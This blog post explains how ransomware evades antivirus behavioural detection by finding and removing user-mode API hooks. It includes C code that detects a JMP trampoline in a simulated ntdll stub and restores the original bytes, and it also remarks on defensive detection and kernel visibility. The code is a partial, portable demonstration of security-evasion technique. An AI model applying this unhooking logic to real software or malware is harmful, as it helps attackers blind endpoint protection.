Threat actor intend to stop your antivirus program – 2018

A new attack method used by ransomware has just been reported: the malware stops and disables the antivirus process on the workstation, and once there is no antivirus protection the threat actor is free to carry out the rest of the attack. Defence vendors have concentrated on ring 0 (kernel) attacks, and the new generation of AV software adds behavioural detection on top. So is there still room for the threat actor? Yes. Ring 3 (user mode) leaves room, because behavioural monitoring commonly works by injecting the AV's own DLL into each process and placing a JMP hook at the start of the API functions it wants to watch. Malware running in the same process, at the same privilege level, can find those hooks, remove them, and so evade the detection. Kernel-side monitoring is not affected by this; only the user-mode hooks are.

For instance, the malware can unhook the monitored APIs as follows:

  1. List all DLL libraries loaded in the current process.
  2. For each DLL, find the entry-point address of every imported API function.
  3. Where the first bytes of a function have been replaced, remove the injected hook JMP instruction by overwriting it with the API's original bytes (taken from a clean copy of the same DLL version).

For a high-level understanding, refer to the diagram above.
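As an added example (not code from the original post), the core of steps 2 and 3 in portable C. A constructed copy of an x64 ntdll syscall stub stands in for the clean bytes a real unhooker would read from the DLL on disk; the in-memory copy is "hooked" with a JMP rel32 trampoline, and the code detects the mismatch, computes where the trampoline points, and restores the original bytes. Module enumeration (step 1) and export-table walking are Windows-specific and are left out so the block runs anywhere; the byte values, the service number 0x18, the relative offsets and the addresses are all assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed sample (not from a real process dump): the first 21 bytes of a
 * typical x64 Windows 10 ntdll syscall stub. The service number 0x18 is
 * illustrative; SSNs change between builds, so a real unhooker must compare
 * against the same ntdll.dll version that is loaded in the process. */
#define STUB_LEN 21
static const uint8_t clean_stub[STUB_LEN] = {
    0x4C, 0x8B, 0xD1,                               /* mov  r10, rcx                */
    0xB8, 0x18, 0x00, 0x00, 0x00,                   /* mov  eax, 18h                */
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, /* test byte ptr [7FFE0308h], 1 */
    0x75, 0x03,                                     /* jne  +3                      */
    0x0F, 0x05,                                     /* syscall                      */
    0xC3                                            /* ret                          */
};

/* Quick heuristic: does the prologue start with a trampoline that user-mode
 * hooking engines commonly write? The byte-for-byte comparison further down
 * is the authoritative check; this only tells the caller what kind it is. */
int is_inline_hook(const uint8_t *mem, size_t n)
{
    if (n >= 5 && mem[0] == 0xE9) return 1;                      /* jmp rel32              */
    if (n >= 6 && mem[0] == 0xFF && mem[1] == 0x25) return 1;    /* jmp [rip+disp32]       */
    if (n >= 12 && mem[0] == 0x48 && mem[1] == 0xB8 &&
        mem[10] == 0xFF && mem[11] == 0xE0) return 1;            /* mov rax, imm64; jmp rax */
    return 0;
}

/* Index of the first byte where the in-memory prologue differs from the
 * clean copy; returns n when they are identical (nothing hooked). */
size_t first_mismatch(const uint8_t *mem, const uint8_t *clean, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (mem[i] != clean[i]) return i;
    return n;
}

/* Where an E9 trampoline lands: address of the JMP + 5 + signed rel32.
 * Useful for reporting which module placed the hook. */
uint64_t e9_target(uint64_t func_addr, const uint8_t *mem)
{
    uint32_t u = (uint32_t)mem[1] | ((uint32_t)mem[2] << 8) |
                 ((uint32_t)mem[3] << 16) | ((uint32_t)mem[4] << 24);
    return func_addr + 5 + (int64_t)(int32_t)u;
}

/* Step 3: overwrite every differing byte with the original. Returns the number
 * of bytes restored (0 means the prologue was already clean). On Windows the
 * caller must first make the page writable (VirtualProtect) and afterwards
 * flush the instruction cache; both are omitted to keep the example portable. */
size_t restore_prologue(uint8_t *mem, const uint8_t *clean, size_t n)
{
    size_t i, restored = 0;
    for (i = 0; i < n; i++)
        if (mem[i] != clean[i]) { mem[i] = clean[i]; restored++; }
    return restored;
}

/* Simulate the hooking engine: copy the clean stub, then overwrite the first
 * five bytes with "jmp rel32" (little-endian displacement). */
void make_hooked_copy(uint8_t *out, int32_t rel32)
{
    uint32_t u = (uint32_t)rel32;
    memcpy(out, clean_stub, STUB_LEN);
    out[0] = 0xE9;
    out[1] = u & 0xFF; out[2] = (u >> 8) & 0xFF;
    out[3] = (u >> 16) & 0xFF; out[4] = (u >> 24) & 0xFF;
}

/* Hook a copy as if it lived at func_addr and return the trampoline target. */
uint64_t hooked_target(uint64_t func_addr, int32_t rel32)
{
    uint8_t buf[STUB_LEN];
    make_hooked_copy(buf, rel32);
    return e9_target(func_addr, buf);
}

/* Full round trip: hook, detect, unhook, verify. Returns bytes restored, 0 on failure. */
size_t unhook_roundtrip(void)
{
    uint8_t mem[STUB_LEN];
    size_t restored;
    make_hooked_copy(mem, 0x1000);
    if (!is_inline_hook(mem, STUB_LEN)) return 0;
    if (first_mismatch(mem, clean_stub, STUB_LEN) != 0) return 0;
    restored = restore_prologue(mem, clean_stub, STUB_LEN);
    if (memcmp(mem, clean_stub, STUB_LEN) != 0) return 0;
    return restored;
}

int main(void)
{
    uint8_t mem[STUB_LEN];
    make_hooked_copy(mem, 0x1000);
    printf("hooked: %d, trampoline -> 0x%llx\n", is_inline_hook(mem, STUB_LEN),
           (unsigned long long)e9_target(0x7FF800000000ULL, mem));
    printf("restored %zu bytes, clean again: %d\n",
           restore_prologue(mem, clean_stub, STUB_LEN), !is_inline_hook(mem, STUB_LEN));
    return 0;
}
```

The same comparison cuts both ways: a defender can run it over its own hooks to detect that they have been removed, and because the restore only touches user-mode memory, a product that also watches from ring 0 still sees the syscalls the unhooked code makes.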

2 thoughts on “Threat actor intend to stop your antivirus program – 2018”

  1. I see something truly interesting about your website, so I saved it to my favorites.

  2. Hello my loved one! I wish to say that this post is amazing, well written and includes almost all vital info. I would like to see more posts like this.
